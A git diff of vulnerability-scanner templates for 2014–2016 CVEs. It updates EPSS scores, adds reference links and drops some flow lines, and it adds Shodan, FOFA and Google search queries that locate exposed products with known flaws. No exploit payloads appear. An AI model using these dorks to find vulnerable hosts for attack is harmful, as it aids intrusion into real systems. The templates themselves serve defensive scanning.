epss-percentile: 0.43869 + epss-percentile: 0.44022 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml index ccc915382c..478b7858c2 100644 --- a/http/cves/2014/CVE-2014-9618.yaml +++ b/http/cves/2014/CVE-2014-9618.yaml @@ -15,13 +15,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2014-9618 - https://www.exploit-db.com/exploits/37933/ - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2014-9618 cwe-id: CWE-287 epss-score: 0.03433 - epss-percentile: 0.90527 + epss-percentile: 0.91476 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-1000005.yaml b/http/cves/2015/CVE-2015-1000005.yaml index 99fd990224..e127593c5c 100644 --- a/http/cves/2015/CVE-2015-1000005.yaml +++ b/http/cves/2015/CVE-2015-1000005.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2015-1000005 cwe-id: CWE-22 - epss-score: 0.047 - epss-percentile: 0.92455 + epss-score: 0.05258 + epss-percentile: 0.93027 cpe: cpe:2.3:a:candidate-application-form_project:candidate-application-form:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml index 444756f589..de0b9ca407 100644 --- a/http/cves/2015/CVE-2015-1427.yaml +++ b/http/cves/2015/CVE-2015-1427.yaml @@ -20,13 +20,14 @@ info: cvss-score: 7.5 cve-id: CVE-2015-1427 cwe-id: CWE-284 - epss-score: 0.85974 - epss-percentile: 0.98485 + epss-score: 0.87385 + epss-percentile: 0.98629 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: elasticsearch product: elasticsearch + fofa-query: index_not_found_exception tags: cve2015,cve,packetstorm,elastic,rce,elasticsearch,kev http: diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml index 611ec88318..966f3227db 100644 --- a/http/cves/2015/CVE-2015-1503.yaml +++ b/http/cves/2015/CVE-2015-1503.yaml @@ -28,6 +28,8 @@ info: vendor: icewarp product: mail_server shodan-query: title:"icewarp" + fofa-query: title="icewarp server administration" + google-query: intitle:"icewarp server administration" tags: cve2015,cve,lfi,mail,packetstorm,icewarp http: diff --git a/http/cves/2015/CVE-2015-1579.yaml b/http/cves/2015/CVE-2015-1579.yaml index 8b1cbf521f..62de6b57dd 100644 --- a/http/cves/2015/CVE-2015-1579.yaml +++ b/http/cves/2015/CVE-2015-1579.yaml @@ -21,8 +21,8 @@ info: cvss-score: 5 cve-id: CVE-2015-1579 cwe-id: CWE-22 - epss-score: 0.90145 - epss-percentile: 0.9855 + epss-score: 0.82302 + epss-percentile: 0.98398 cpe: cpe:2.3:a:elegant_themes:divi:-:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2015/CVE-2015-1635.yaml b/http/cves/2015/CVE-2015-1635.yaml index 4398251cff..0251c0c926 100644 --- a/http/cves/2015/CVE-2015-1635.yaml +++ b/http/cves/2015/CVE-2015-1635.yaml @@ -17,8 +17,8 @@ info: cvss-score: 10 cve-id: CVE-2015-1635 cwe-id: CWE-94 - epss-score: 0.97537 - epss-percentile: 0.99992 + epss-score: 0.9754 + epss-percentile: 0.99994 cpe: cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml index da134bc3b4..237ab86213 100644 --- a/http/cves/2015/CVE-2015-1880.yaml +++ b/http/cves/2015/CVE-2015-1880.yaml @@ -27,6 +27,8 @@ info: max-request: 1 vendor: fortinet product: fortios + shodan-query: http.html:"/remote/login" "xxxxxxxx" + fofa-query: body="/remote/login" "xxxxxxxx" tags: cve2015,cve,xss,fortigates,intrusive,fortinet http: diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index db07a3904a..07927481dd 100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-2068 cwe-id: CWE-79 epss-score: 0.00146 - epss-percentile: 0.4958 + epss-percentile: 0.50455 cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-2080.yaml b/http/cves/2015/CVE-2015-2080.yaml index affbf5e835..cee184fae4 100644 --- a/http/cves/2015/CVE-2015-2080.yaml +++ b/http/cves/2015/CVE-2015-2080.yaml @@ -18,13 +18,14 @@ info: cvss-score: 7.5 cve-id: CVE-2015-2080 cwe-id: CWE-200 - epss-score: 0.95465 - epss-percentile: 0.99329 + epss-score: 0.95345 + epss-percentile: 0.99356 cpe: cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:* metadata: max-request: 1 vendor: fedoraproject product: fedora + shodan-query: cpe:"cpe:2.3:o:fedoraproject:fedora" tags: cve2015,cve,jetty,packetstorm,fedoraproject http: diff --git a/http/cves/2015/CVE-2015-2166.yaml b/http/cves/2015/CVE-2015-2166.yaml index 045252b92f..7c88c23a6d 100644 --- a/http/cves/2015/CVE-2015-2166.yaml +++ b/http/cves/2015/CVE-2015-2166.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5 cve-id: CVE-2015-2166 cwe-id: CWE-22 - epss-score: 0.23272 - epss-percentile: 0.96445 + epss-score: 0.29639 + epss-percentile: 0.96917 cpe: cpe:2.3:a:ericsson:drutt_mobile_service_delivery_platform:4.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index 2e0903f253..34b19334ff 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2015-2196 cwe-id: CWE-89 - epss-score: 0.0025 - epss-percentile: 0.6433 + epss-score: 0.00253 + epss-percentile: 0.65124 cpe: cpe:2.3:a:web-dorado:spider_calendar:1.4.9:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml index 1c126b301d..4172f02203 100644 --- a/http/cves/2015/CVE-2015-2755.yaml +++ b/http/cves/2015/CVE-2015-2755.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2015-2755 cwe-id: CWE-352 epss-score: 0.01828 - epss-percentile: 0.87952 + epss-percentile: 0.88216 cpe: cpe:2.3:a:ab_google_map_travel_project:ab_google_map_travel:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -30,7 +30,7 @@ info: vendor: ab_google_map_travel_project product: ab_google_map_travel framework: wordpress - tags: cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,authenticated,ab_google_map_travel_project + tags: packetstorm,cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,authenticated,ab_google_map_travel_project http: - raw: diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index 7f5783fa83..e106537f6f 100644 --- a/http/cves/2015/CVE-2015-2807.yaml +++ b/http/cves/2015/CVE-2015-2807.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-2807 cwe-id: CWE-79 epss-score: 0.00294 - epss-percentile: 0.68624 + epss-percentile: 0.69186 cpe: cpe:2.3:a:documentcloud:navis_documentcloud:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -30,7 +30,6 @@ info: framework: wordpress google-query: inurl:"/wp-content/plugins/navis-documentcloud" tags: cve2015,cve,wordpress,wp-plugin,xss,documentcloud - flow: http(1) && http(2) http: diff --git a/http/cves/2015/CVE-2015-2996.yaml b/http/cves/2015/CVE-2015-2996.yaml index 56ac0bbd61..6477f07092 100644 --- a/http/cves/2015/CVE-2015-2996.yaml +++ b/http/cves/2015/CVE-2015-2996.yaml @@ -29,6 +29,7 @@ info: vendor: sysaid product: sysaid shodan-query: http.favicon.hash:1540720428 + fofa-query: icon_hash=1540720428 tags: cve2015,cve,sysaid,lfi,seclists http: diff --git a/http/cves/2015/CVE-2015-3035.yaml b/http/cves/2015/CVE-2015-3035.yaml index 534a9216db..4540b128f8 100644 --- a/http/cves/2015/CVE-2015-3035.yaml +++ b/http/cves/2015/CVE-2015-3035.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2015-3035 cwe-id: CWE-22 epss-score: 0.58993 - epss-percentile: 0.97444 + epss-percentile: 0.97743 cpe: cpe:2.3:o:tp-link:tl-wr841n_\(9.0\)_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: tp-link product: tl-wr841n_\(9.0\)_firmware shodan-query: http.title:"TP-LINK" + fofa-query: title="tp-link" + google-query: intitle:"tp-link" tags: cve2015,cve,router,lfi,seclists,tplink,kev,tp-link http: diff --git a/http/cves/2015/CVE-2015-3224.yaml b/http/cves/2015/CVE-2015-3224.yaml index df6b263f83..117fdd6353 100644 --- a/http/cves/2015/CVE-2015-3224.yaml +++ b/http/cves/2015/CVE-2015-3224.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-3224 cwe-id: CWE-284 epss-score: 0.92904 - epss-percentile: 0.98975 + epss-percentile: 0.99025 cpe: cpe:2.3:a:rubyonrails:web_console:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml index 2f802b7da9..e6e73bdd4f 100644 --- a/http/cves/2015/CVE-2015-3337.yaml +++ b/http/cves/2015/CVE-2015-3337.yaml @@ -20,13 +20,14 @@ info: cvss-score: 4.3 cve-id: CVE-2015-3337 cwe-id: CWE-22 - epss-score: 0.96447 - epss-percentile: 0.9948 + epss-score: 0.96187 + epss-percentile: 0.99512 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: elasticsearch product: elasticsearch + fofa-query: index_not_found_exception tags: cve2015,cve,packetstorm,edb,elastic,lfi,elasticsearch,plugin http: diff --git a/http/cves/2015/CVE-2015-4050.yaml b/http/cves/2015/CVE-2015-4050.yaml index dc67e6688d..75a3533dfb 100644 --- a/http/cves/2015/CVE-2015-4050.yaml +++ b/http/cves/2015/CVE-2015-4050.yaml @@ -21,12 +21,13 @@ info: cve-id: CVE-2015-4050 cwe-id: CWE-284 epss-score: 0.00598 - epss-percentile: 0.77957 + epss-percentile: 0.78364 cpe: cpe:2.3:a:sensiolabs:symfony:2.3.19:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sensiolabs product: symfony + shodan-query: cpe:"cpe:2.3:a:sensiolabs:symfony" tags: cve2015,cve,symfony,rce,sensiolabs http: diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index a3086ce3cd..f1e8b0ce01 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.5 cve-id: CVE-2015-4062 cwe-id: CWE-89 - epss-score: 0.03919 - epss-percentile: 0.91099 + epss-score: 0.0272 + epss-percentile: 0.90505 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-4074.yaml b/http/cves/2015/CVE-2015-4074.yaml index 7b9c50d4cb..3564b8856b 100644 --- a/http/cves/2015/CVE-2015-4074.yaml +++ b/http/cves/2015/CVE-2015-4074.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-4074 cwe-id: CWE-22 epss-score: 0.00598 - epss-percentile: 0.77961 + epss-percentile: 0.78367 cpe: cpe:2.3:a:helpdesk_pro_project:helpdesk_pro:*:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index d418678913..2b35be4787 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -15,13 +15,14 @@ info: - https://wpscan.com/vulnerability/2d5b3707-f58a-4154-93cb-93f7058e3408 - https://wordpress.org/plugins/church-admin/changelog/ - https://nvd.nist.gov/vuln/detail/CVE-2015-4127 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-4127 cwe-id: CWE-79 epss-score: 0.0034 - epss-percentile: 0.68397 + epss-percentile: 0.71383 cpe: cpe:2.3:a:church_admin_project:church_admin:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -29,7 +30,6 @@ info: product: church_admin framework: wordpress tags: cve2015,cve,wp-plugin,wp,edb,wpscan,wordpress,xss,church_admin_project - flow: http(1) && http(2) http: diff --git a/http/cves/2015/CVE-2015-4455.yaml b/http/cves/2015/CVE-2015-4455.yaml index 39485d2025..ea36b7cd0f 100644 --- a/http/cves/2015/CVE-2015-4455.yaml +++ b/http/cves/2015/CVE-2015-4455.yaml @@ -9,13 +9,14 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2015-4455 - http://packetstormsecurity.com/files/132256/WordPress-Aviary-Image-Editor-Add-On-For-Gravity-Forms-3.0-Beta-Shell-Upload.html + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2015-4455 cwe-id: CWE-434 - epss-score: 0.28491 - epss-percentile: 0.96807 + epss-score: 0.55856 + epss-percentile: 0.97673 cpe: cpe:2.3:a:aviary_image_editor_add-on_for_gravity_forms_project:aviary_image_editor_add-on_for_gravity_forms:*:beta:*:*:*:wordpress:*:* metadata: vendor: aviary_image_editor_add-on_for_gravity_forms_project diff --git a/http/cves/2015/CVE-2015-4632.yaml b/http/cves/2015/CVE-2015-4632.yaml index 736b7ef8af..9b15f9d743 100644 --- a/http/cves/2015/CVE-2015-4632.yaml +++ b/http/cves/2015/CVE-2015-4632.yaml @@ -27,6 +27,7 @@ info: max-request: 1 vendor: koha product: koha + shodan-query: cpe:"cpe:2.3:a:koha:koha" tags: cve2015,cve,lfi,edb,koha http: diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml index 30e491e3ac..dcfea4e355 100644 --- a/http/cves/2015/CVE-2015-4666.yaml +++ b/http/cves/2015/CVE-2015-4666.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-4666 cwe-id: CWE-22 epss-score: 0.02372 - epss-percentile: 0.89592 + epss-percentile: 0.89823 cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4668.yaml b/http/cves/2015/CVE-2015-4668.yaml index cb04dbfe5c..12ca3e511e 100644 --- a/http/cves/2015/CVE-2015-4668.yaml +++ b/http/cves/2015/CVE-2015-4668.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2015-4668 cwe-id: CWE-601 epss-score: 0.00397 - epss-percentile: 0.73024 + epss-percentile: 0.73425 cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4694.yaml b/http/cves/2015/CVE-2015-4694.yaml index fff5f19692..13b7beca88 100644 --- a/http/cves/2015/CVE-2015-4694.yaml +++ b/http/cves/2015/CVE-2015-4694.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-4694 cwe-id: CWE-22 epss-score: 0.02304 - epss-percentile: 0.88593 + epss-percentile: 0.89683 cpe: cpe:2.3:a:zip_attachments_project:zip_attachments:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml index 23b34974f9..cb35e3d581 100644 --- a/http/cves/2015/CVE-2015-5461.yaml +++ b/http/cves/2015/CVE-2015-5461.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-5461 cwe-id: NVD-CWE-Other epss-score: 0.0055 - epss-percentile: 0.77025 + epss-percentile: 0.77434 cpe: cpe:2.3:a:stageshow_project:stageshow:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml index 039fd0a3d6..e4ec4623ba 100644 --- a/http/cves/2015/CVE-2015-5471.yaml +++ b/http/cves/2015/CVE-2015-5471.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.3 cve-id: CVE-2015-5471 cwe-id: CWE-22 - epss-score: 0.10406 - epss-percentile: 0.94855 + epss-score: 0.14014 + epss-percentile: 0.95676 cpe: cpe:2.3:a:swim_team_project:swim_team:1.44.10777:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-5531.yaml b/http/cves/2015/CVE-2015-5531.yaml index 0fcc460443..6490ab3b0e 100644 --- a/http/cves/2015/CVE-2015-5531.yaml +++ b/http/cves/2015/CVE-2015-5531.yaml @@ -21,12 +21,13 @@ info: cve-id: CVE-2015-5531 cwe-id: CWE-22 epss-score: 0.97144 - epss-percentile: 0.99783 + epss-percentile: 0.99802 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: elasticsearch product: elasticsearch + fofa-query: index_not_found_exception tags: cve2015,cve,vulhub,packetstorm,elasticsearch,intrusive http: diff --git a/http/cves/2015/CVE-2015-5688.yaml b/http/cves/2015/CVE-2015-5688.yaml index e6e306178d..4362111d4d 100644 --- a/http/cves/2015/CVE-2015-5688.yaml +++ b/http/cves/2015/CVE-2015-5688.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-5688 cwe-id: CWE-22 epss-score: 0.01347 - epss-percentile: 0.84665 + epss-percentile: 0.86101 cpe: cpe:2.3:a:geddyjs:geddy:13.0.7:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-7245.yaml b/http/cves/2015/CVE-2015-7245.yaml index 4bb280a998..46aa09eb58 100644 --- a/http/cves/2015/CVE-2015-7245.yaml +++ b/http/cves/2015/CVE-2015-7245.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2015-7245 cwe-id: CWE-22 - epss-score: 0.96881 - epss-percentile: 0.99685 + epss-score: 0.96378 + epss-percentile: 0.99562 cpe: cpe:2.3:o:d-link:dvg-n5402sp_firmware:w1000cn-00:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-7297.yaml b/http/cves/2015/CVE-2015-7297.yaml index 66e1e5cc4e..efce4d7741 100644 --- a/http/cves/2015/CVE-2015-7297.yaml +++ b/http/cves/2015/CVE-2015-7297.yaml @@ -27,6 +27,8 @@ info: max-request: 1 vendor: joomla product: joomla\! + shodan-query: http.html:"joomla! - open source content management" + fofa-query: body="joomla! - open source content management" tags: cve2015,cve,packetstorm,joomla,sqli variables: num: "999999999" diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml index aeb1876bf4..4a2e6f00b8 100644 --- a/http/cves/2015/CVE-2015-7377.yaml +++ b/http/cves/2015/CVE-2015-7377.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-7377 cwe-id: CWE-79 epss-score: 0.00232 - epss-percentile: 0.60606 + epss-percentile: 0.61233 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml index 2691b887e5..383609faa4 100644 --- a/http/cves/2015/CVE-2015-7450.yaml +++ b/http/cves/2015/CVE-2015-7450.yaml @@ -21,13 +21,14 @@ info: cve-id: CVE-2015-7450 cwe-id: CWE-94 epss-score: 0.97122 - epss-percentile: 0.99772 + epss-percentile: 0.99794 cpe: cpe:2.3:a:ibm:tivoli_common_reporting:2.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ibm product: tivoli_common_reporting shodan-query: http.html:"IBM WebSphere Portal" + fofa-query: body="ibm websphere portal" tags: cve2015,cve,websphere,deserialization,rce,oast,ibm,java,kev http: diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index 7e072d80be..76babb3ca9 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: zohocorp product: manageengine_firewall_analyzer + shodan-query: http.title:"opmanager plus" + fofa-query: title="opmanager plus" + google-query: intitle:"opmanager plus" tags: cve2015,cve,manageengine,edb,lfi,zohocorp http: diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml index 2d6874a424..48ac5eaa85 100644 --- a/http/cves/2015/CVE-2015-7823.yaml +++ b/http/cves/2015/CVE-2015-7823.yaml @@ -26,6 +26,9 @@ info: max-request: 1 vendor: kentico product: kentico_cms + google-query: intitle:"kentico database setup" + shodan-query: cpe:"cpe:2.3:a:kentico:kentico_cms" + fofa-query: title="kentico database setup" tags: cve2015,cve,kentico,redirect,packetstorm http: diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml index f3987bd59c..40f41a116d 100644 --- a/http/cves/2015/CVE-2015-8813.yaml +++ b/http/cves/2015/CVE-2015-8813.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-8813 cwe-id: CWE-918 epss-score: 0.00511 - epss-percentile: 0.74145 + epss-percentile: 0.76541 cpe: cpe:2.3:a:umbraco:umbraco:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-9312.yaml b/http/cves/2015/CVE-2015-9312.yaml index 72bff270c2..24ac9ef8b7 100644 --- a/http/cves/2015/CVE-2015-9312.yaml +++ b/http/cves/2015/CVE-2015-9312.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-9312 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-9323.yaml b/http/cves/2015/CVE-2015-9323.yaml index 1eb135a0b2..2a0210fefb 100644 --- a/http/cves/2015/CVE-2015-9323.yaml +++ b/http/cves/2015/CVE-2015-9323.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2015-9323 cwe-id: CWE-89 - epss-score: 0.00869 - epss-percentile: 0.82013 + epss-score: 0.0071 + epss-percentile: 0.80421 cpe: cpe:2.3:a:duckdev:404_to_301:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-9480.yaml b/http/cves/2015/CVE-2015-9480.yaml index 801ab61c55..ecfc655446 100644 --- a/http/cves/2015/CVE-2015-9480.yaml +++ b/http/cves/2015/CVE-2015-9480.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2015-9480 cwe-id: CWE-22 - epss-score: 0.57022 - epss-percentile: 0.97634 + epss-score: 0.35852 + epss-percentile: 0.97147 cpe: cpe:2.3:a:robot-cpa:robotcpa:5:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-0957.yaml b/http/cves/2016/CVE-2016-0957.yaml index 956cf7aa6e..6f4242a870 100644 --- a/http/cves/2016/CVE-2016-0957.yaml +++ b/http/cves/2016/CVE-2016-0957.yaml @@ -20,7 +20,7 @@ info: cvss-score: 7.5 cve-id: CVE-2016-0957 epss-score: 0.03344 - epss-percentile: 0.91144 + epss-percentile: 0.91361 cpe: cpe:2.3:a:adobe:dispatcher:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000126.yaml b/http/cves/2016/CVE-2016-1000126.yaml index f510eb8ec5..958d600173 100644 --- a/http/cves/2016/CVE-2016-1000126.yaml +++ b/http/cves/2016/CVE-2016-1000126.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2016-1000126 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.4505 + epss-percentile: 0.46028 cpe: cpe:2.3:a:admin-font-editor_project:admin-font-editor:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -30,7 +30,6 @@ info: framework: wordpress google-query: inurl:"/wp-content/plugins/admin-font-editor" tags: cve2016,cve,wordpress,xss,wp-plugin,admin-font-editor_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000127.yaml b/http/cves/2016/CVE-2016-1000127.yaml index 7e630bcd37..819cd9a4da 100644 --- a/http/cves/2016/CVE-2016-1000127.yaml +++ b/http/cves/2016/CVE-2016-1000127.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-1000127 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45851 + epss-percentile: 0.46028 cpe: cpe:2.3:a:ajax-random-post_project:ajax-random-post:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -28,7 +28,6 @@ info: product: ajax-random-post framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,ajax-random-post_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000131.yaml b/http/cves/2016/CVE-2016-1000131.yaml index c40b7762e2..ddc90d9a85 100644 --- a/http/cves/2016/CVE-2016-1000131.yaml +++ b/http/cves/2016/CVE-2016-1000131.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000131 cwe-id: CWE-79 - epss-score: 0.00101 - epss-percentile: 0.40457 + epss-score: 0.00114 + epss-percentile: 0.44874 cpe: cpe:2.3:a:e-search_project:esearch:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -29,7 +29,6 @@ info: framework: wordpress google-query: inurl:"/wp-content/plugins/e-search" tags: cve2016,cve,wordpress,xss,wp-plugin,e-search_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000133.yaml b/http/cves/2016/CVE-2016-1000133.yaml index fc40ec91c0..d2a6bff841 100644 --- a/http/cves/2016/CVE-2016-1000133.yaml +++ b/http/cves/2016/CVE-2016-1000133.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-1000133 cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.48963 + epss-percentile: 0.4984 cpe: cpe:2.3:a:designsandcode:forget_about_shortcode_buttons:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -29,7 +29,6 @@ info: framework: wordpress google-query: inurl:"/wp-content/plugins/forget-about-shortcode-buttons" tags: cve2016,cve,wordpress,xss,wp-plugin,designsandcode - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000137.yaml b/http/cves/2016/CVE-2016-1000137.yaml index 1fcafa1b37..2264face94 100644 --- a/http/cves/2016/CVE-2016-1000137.yaml +++ b/http/cves/2016/CVE-2016-1000137.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000137 cwe-id: CWE-79 - epss-score: 0.00101 - epss-percentile: 0.40457 + epss-score: 0.00114 + epss-percentile: 0.44874 cpe: cpe:2.3:a:hero-maps-pro_project:hero-maps-pro:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -29,7 +29,6 @@ info: product: hero-maps-pro framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,maps,hero-maps-pro_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000138.yaml b/http/cves/2016/CVE-2016-1000138.yaml index 1ede5cabd6..770118966e 100644 --- a/http/cves/2016/CVE-2016-1000138.yaml +++ b/http/cves/2016/CVE-2016-1000138.yaml @@ -14,13 +14,14 @@ info: - https://wordpress.org/plugins/indexisto - http://web.archive.org/web/20210622181116/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000138 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000138 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45775 + epss-percentile: 0.46028 cpe: cpe:2.3:a:indexisto_project:indexisto:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -29,7 +30,6 @@ info: framework: wordpress google-query: inurl:"/wp-content/plugins/indexisto" tags: cve,cve2016,wordpress,xss,wp-plugin,indexisto_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000141.yaml b/http/cves/2016/CVE-2016-1000141.yaml index e4270a0dd4..f5ce2fac75 100644 --- a/http/cves/2016/CVE-2016-1000141.yaml +++ b/http/cves/2016/CVE-2016-1000141.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-1000141 